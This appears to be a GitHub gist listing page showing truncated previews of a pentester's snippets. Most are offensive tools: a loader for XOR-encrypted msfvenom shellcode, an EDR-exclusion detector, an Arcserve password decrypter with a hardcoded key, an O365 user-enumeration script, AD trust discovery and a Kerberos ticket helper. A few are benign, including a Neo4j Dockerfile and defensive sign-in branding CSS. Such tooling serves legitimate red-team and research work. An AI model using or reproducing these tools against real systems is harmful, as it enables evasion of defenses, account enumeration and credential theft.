Skip to content

Instantly share code, notes, and snippets.

View dadevel's full-sized avatar

Daniel dadevel

38 followers · 12 following
View GitHub Profile
@dadevel
dadevel / Dockerfile
Last active February 18, 2024 14:46
Neo4j container with APOC and GDS
# usage: docker build -t ghcr.io/dadevel/neo4j:4.4.12 . && docker run -d --name neo4j -p 127.0.0.1:7474:7474 -p 127.0.0.1:7687:7687 -e NEO4J_AUTH=none ghcr.io/dadevel/neo4j:4.4.12
FROM docker.io/library/neo4j:4.4.12
# apoc version from https://neo4j-contrib.github.io/neo4j-apoc-procedures/versions.json
RUN wget -qO /var/lib/neo4j/plugins/apoc.jar https://github.com/neo4j-contrib/neo4j-apoc-procedures/releases/download/4.4.0.11/apoc-4.4.0.11-all.jar
# gds version from https://graphdatascience.ninja/versions.json
RUN wget -qO /var/lib/neo4j/plugins/gds.jar https://graphdatascience.ninja/neo4j-graph-data-science-2.2.3.jar
RUN echo 'dbms.security.procedures.unrestricted=apoc.*,gds.*' >> /var/lib/neo4j/conf/neo4j.conf && \
echo 'dbms.security.procedures.allowlist=apoc.*,gds.*' >> /var/lib/neo4j/conf/neo4j.conf
@dadevel
dadevel / style.css
Created February 14, 2024 19:45
Protective Branding for M365
/* Open https://portal.azure.com, select Entra ID > Company branding > Default sign-in > Edit > Layout > Custom CSS and upload this file */
.ext-sign-in-box {
background-image: url("https://protective-branding.cloudgate.workers.dev/background.svg");
}
@dadevel
dadevel / byorwx.cpp
Last active December 4, 2023 20:57
Bring your own RWX section
#include <cstdint>
// x86_64-w64-mingw32-g++ -lstdc++ -static -O3 -s -DPAYLOAD_SIZE=276 ./byorwx.cpp ./section.S -o ./byorwx.exe
// msfvenom -p windows/x64/exec -f c CMD=calc.exe --encrypt xor --encrypt-key abcdef
unsigned char buf[] =
"\x9d\x2a\xe0\x80\x95\x8e\xa1\x62\x63\x64\x24\x37\x20\x32"
"\x31\x35\x33\x2e\x50\xb0\x06\x2c\xee\x34\x01\x2a\xe8\x36"
"\x7d\x2e\xea\x30\x43\x2c\xee\x14\x31\x2a\x6c\xd3\x2f\x2c"
"\x2c\x53\xaa\x2c\x54\xa6\xcd\x5e\x02\x18\x67\x4a\x41\x23"
@dadevel
dadevel / README.md
Last active March 19, 2024 13:18
Proxychains Quick Config
@dadevel
dadevel / CheckDLLs.ps1
Last active November 8, 2023 12:24
EDR Exclusion Detector
# based on https://gist.github.com/S3cur3Th1sSh1t/d9aad93027aad893adae8805d59e2d73
# Get-Process | Get-LoadedModules -ModuleNames 'InProcessClient.dll','InProcessClient64.dll','MinProcessClient.dll','MinProcessClient64.dll' | ?{!$_.'InProcessClient.dll' -and !$_.'InProcessClient64.dll'} | ft -auto
function Get-LoadedModules {
param(
[Parameter(Mandatory,ValueFromPipeline)]
[System.Diagnostics.Process]
$Processes,
[Parameter(Mandatory)]
[string[]]
@dadevel
dadevel / ArcserveDecrypter.cpp
Last active August 31, 2023 20:30
ArcserveDecrypter
#include <windows.h>
#include <stdio.h>
// compilation: x86_64-w64-mingw32-g++ -m64 -Wall -Wextra -std=c++20 -lstdc++ -static -Os -s -o ./ArcserveDecrypter.exe ./ArcserveDecrypter.cpp
// usage: ./ArcserveDecrypter.exe HEXBLOB
// based on https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe/blob/main/ArcServeDecrypter.c
constexpr unsigned char key[] = { 0x50, 0x00, 0x6C, 0x00, 0x65, 0x00, 0x61, 0x00, 0x73, 0x00, 0x65, 0x00, 0x20, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x70, 0x00, 0x75, 0x00, 0x74, 0x00, 0x20, 0x00, 0x61, 0x00, 0x20, 0x00, 0x76, 0x00, 0x61, 0x00, 0x6C, 0x00, 0x69, 0x00, 0x64, 0x00, 0x20, 0x00, 0x70, 0x00, 0x61, 0x00, 0x73, 0x00, 0x73, 0x00, 0x77, 0x00, 0x6F, 0x00, 0x72, 0x00, 0x64, 0x00 };
constexpr auto key_len = sizeof(key);
@dadevel
dadevel / azmail.py
Last active February 28, 2023 13:35
Send Email with Azure/M365
#!/usr/bin/env python3
from argparse import ArgumentParser
import json
import sys
import requests
# Retrieve an access token via the device code flow:
# roadtx auth --tokenfile ~/.cache/azmail.json --resource https://outlook.office.com --client d3590ed6-52b3-4102-aeff-aad2292ab01c --tenant contoso.com --device-code
@dadevel
dadevel / o365-user-enum.py
Created February 22, 2023 11:10
O365 User Enumeration
#!/usr/bin/python3
import requests
import sys
# usage: cat ./gathered-emails.txt | ./o365-user-enum.py | tee -a ./valid-emails.txt
url = 'https://login.microsoftonline.com/common/GetCredentialType'
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5359.178 Safari/537.36 Edg/106.0.1266.51'
with requests.session() as session:
@dadevel
dadevel / ldeep-trust-discover.sh
Last active January 27, 2023 22:43
AD Trust Discovery with franc-pentest/ldeep#27
#!/usr/bin/env bash
set -euo pipefail
# usage: ldeep-trust-discover child.corp.com -u user -p passw0rd
discover() {
if [[ ! -e "./trust-$1.json" ]]; then
echo "discovering $1" >&2
ldeep ldap -s ldaps://"$1" "${@:2}" trusts -v > "./trust-$1.json" 2> /dev/null || \
ldeep ldap -s ldap://"$1" "${@:2}" trusts -v > "./trust-$1.json" 2> /dev/null || {
@dadevel
dadevel / impacket-ccache-helper.py
Last active July 15, 2023 14:02
Impacket Ticket Helper
#!/usr/bin/env python3
from argparse import ArgumentParser, Namespace
import base64
import hashlib
import itertools
import os
import shlex
import sys
from impacket.krb5.ccache import CCache